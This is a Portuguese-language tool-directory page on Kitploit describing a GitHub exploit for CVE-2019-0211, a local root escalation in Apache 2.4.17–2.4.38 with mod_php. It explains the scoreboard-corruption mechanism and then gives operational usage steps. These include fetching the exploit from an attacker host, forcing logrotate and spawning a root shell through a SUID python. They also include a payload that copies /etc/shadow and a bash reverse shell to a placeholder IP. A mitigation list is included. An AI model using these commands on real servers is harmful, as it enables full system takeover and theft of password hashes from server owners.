Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-0211-exploit — Exploit de escalonamento de privilégios local para CVE-2019-0211 visando Apache HTTP Server 2.4.17-2.4.38 com mod_php. Usa UAF no PHP para corromper o scoreboard do Apache e executar comandos arbitrários como root via graceful restart. | Kitploit
Ferramentas/GitHubGitHub/jeanback1/cve-2019-0211-exploit
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubjeanback1/cve-2019-0211-exploit

CVE-2019-0211-exploit

Exploit de escalonamento de privilégios local para CVE-2019-0211 visando Apache HTTP Server 2.4.17-2.4.38 com mod_php. Usa UAF no PHP para corromper o scoreboard do Apache e executar comandos arbitrários como root via graceful restart.

Ver Repositório
3há 3 mesesAinda não revisado

CVE-2019-0211 — Apache HTTP Server Escalada de Privilégios Local (CARPE DIEM)

Descrição

CVE-2019-0211 é uma vulnerabilidade de escalada de privilégios local que afeta o Apache HTTP Server entre as versões 2.4.17 e 2.4.38 com mod_prefork e mod_php (ou PHP-FPM).

A vulnerabilidade permite a um atacante com uma shell como www-data escalar para root mediante uma combinação de Use-After-Free (UAF) em PHP e corrupção do scoreboard do Apache. Quando o Apache realiza um graceful restart (por exemplo, mediante logrotate às 6:25 AM), executa child_init() antes de dropar privilégios. Se conseguirmos corromper o ponteiro para esta função, podemos fazer o Apache executar um comando arbitrário como root.

CVSS 3.1: 7.8 (HIGH) — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Detalhes Técnicos

Mecanismo

Apache utiliza uma região de memória compartilhada chamada scoreboard onde cada processo filho worker tem uma estrutura process_score com um ponteiro bucket para prefork_child_bucket. Este bucket contém um apr_proc_mutex_t com ponteiros para funções (meth->child_init()).

Quando o Apache faz um graceful restart (trigger natural às 6:25 AM por logrotate), chama child_init() antes de dropar privilégios. O exploit:

  1. Provoca um UAF em PHP manipulando objetos DateInterval e serialização JSON
  2. Obtém uma primitiva de leitura/escrita arbitrária na memória
  3. Lê /proc/self/maps para localizar o scoreboard (SHM em /dev/zero)
  4. Encontra a estrutura all_buckets na memória do Apache
  5. Sobrescreve os buckets com um payload que redireciona meth->child_init() para system()
  6. No próximo restart, o Apache executa o payload como root

Exploit

Autor original

Charles Fol — @cfreal_

Post original: CARPE DIEM — CVE-2019-0211 Apache Local Root

Requisitos

  • Apache HTTP Server 2.4.17 – 2.4.38 com mod_php (PHP 7.x)
  • Shell como www-data no servidor
  • Capacidade de escrever um arquivo .php em um diretório servido pelo Apache

Uso

root@kitploit:~
# 1. Enviar o exploit para o servidor vulnerável
# Da sua máquina atacante:
python3 -m http.server 8080
# No servidor (como www-data):
cd /var/www/html
wget http://TU_IP:8080/carpediem.php

# 2. Executar o exploit
curl http://localhost/carpediem.php

# 3. Aguardar o Apache fazer graceful restart
# Opção A) Aguardar até as 6:25 AM (logrotate automático)
# Opção B) Forçar logrotate se tiver permissões:
sudo /usr/sbin/logrotate /etc/logrotate.conf --force

# 4. Verificar se python3.5 agora é SUID root
ls -la /usr/bin/python3.5
# Saída esperada: -rwsr-sr-x 2 root root ...

# 5. Escalar para root
python3.5 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Payload personalizado

Você pode alterar o comando executado como root usando o parâmetro cmd:

root@kitploit:~
# Exemplo: fazer uma cópia de /etc/shadow
curl "http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/"

# Exemplo: reverse shell
curl "http://localhost/carpediem.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/TU_IP/PUERTO+0>%261'"

Taxa de Sucesso

Workers

Mais workers = maior taxa de sucesso.


Mitigação

  • Atualizar o Apache HTTP Server para a versão ≥ 2.4.39
  • Migrar de MPM prefork para MPM event (menor superfície de ataque no scoreboard)
  • Restringir o acesso a /proc/self/maps mediante hidef ou AppArmor/SELinux

Referências

  • NVD — CVE-2019-0211
  • CARPE DIEM Blogpost — Charles Fol
  • Exploit no GitHub — cfreal/exploits
  • Exploit-DB #46676
  • Apache Security Advisories
Baixar ferramenta
CampoValor
CVECVE-2019-0211
ProdutoApache HTTP Server
Versões afetadas2.4.17 – 2.4.38
TipoLocal Privilege Escalation (CWE-269)
RequisitoShell como www-data, Apache com mod_php, MPM prefork/worker/event
CVSS 3.17.8 HIGH
CorreçãoApache 2.4.39
Sucesso
Tentativas
Falhas
5 (default)87%17726
889%608
1095%704